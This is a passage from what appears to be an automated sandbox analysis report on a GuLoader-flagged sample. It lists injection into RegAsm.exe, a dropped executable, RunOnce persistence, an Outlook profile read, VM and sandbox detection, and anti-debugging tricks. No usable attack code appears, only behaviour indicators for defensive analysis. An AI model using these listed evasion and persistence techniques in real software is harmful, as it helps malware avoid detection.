            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6264, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6072, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6432, type: MEMORY
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040BD33 push cs; ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040AD97 push ds; retf
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040AE05 push ds; retf
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040BE17 push cs; ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B569B push esp; retf
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B2A12 push ebp; rep ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B5624 push ds; ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B2A55 push ebp; rep ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B364A push ds; retf
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B0E45 push ds; ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B109B push edi; ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B25BC push edx; ret
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B4D09 push ds; retf
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE109A push edi; ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE5697 push esp; retf
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE140B push esi; ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE25BC push edx; ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE0F2C push edi; ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE151A push esi; ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE4112 push edx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1D9B3349 push cs; retf 001Fh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DF47CA push 8BFFFFFFh; retf
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_02150A37 push 37480215h; retf
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_02152620 push edx; ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_02153A20 push edx; retf
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_02152A95 push ebp; rep ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_02155697 push esp; retf
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_021525BC push edx; ret
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_021527A6 push E22BA338h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_011356C5 push edi; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\sore\PREIMBUED.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce PROLOGISINJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce PROLOGISINJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce PROLOGISINJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce PROLOGISINJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\sore\PREIMBUED.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\PO_010-240.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\PO_010-240.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\sore\PREIMBUED.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\sore\PREIMBUED.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\sore\PREIMBUED.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\sore\PREIMBUED.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0096622C rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3126
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 608
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9247
            Source: C:\Users\user\sore\PREIMBUED.exeAPI coverage: 4.2 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 772Thread sleep time: -26747778906878833s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7024Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7028Thread sleep count: 608 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7028Thread sleep count: 9247 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: RegAsm.exe, 00000001.00000002.294011273.0000000020030000.00000002.00000001.sdmp, RegAsm.exe, 00000008.00000002.1284536082.00000000206F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: RegAsm.exe, 00000008.00000002.1278287252.0000000001346000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000001.00000002.294011273.0000000020030000.00000002.00000001.sdmp, RegAsm.exe, 00000008.00000002.1284536082.00000000206F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 00000001.00000002.294011273.0000000020030000.00000002.00000001.sdmp, RegAsm.exe, 00000008.00000002.1284536082.00000000206F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: RegAsm.exe, 00000001.00000002.294011273.0000000020030000.00000002.00000001.sdmp, RegAsm.exe, 00000008.00000002.1284536082.00000000206F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\PO_010-240.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Users\user\sore\PREIMBUED.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Users\user\sore\PREIMBUED.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Users\user\sore\PREIMBUED.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Users\user\sore\PREIMBUED.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0096622C rdtsc
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B3B84 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_009658A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_009650F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00965875 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00962BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00964D47 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F850F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F858A0 mov eax, dword ptr fs:[00000030h]
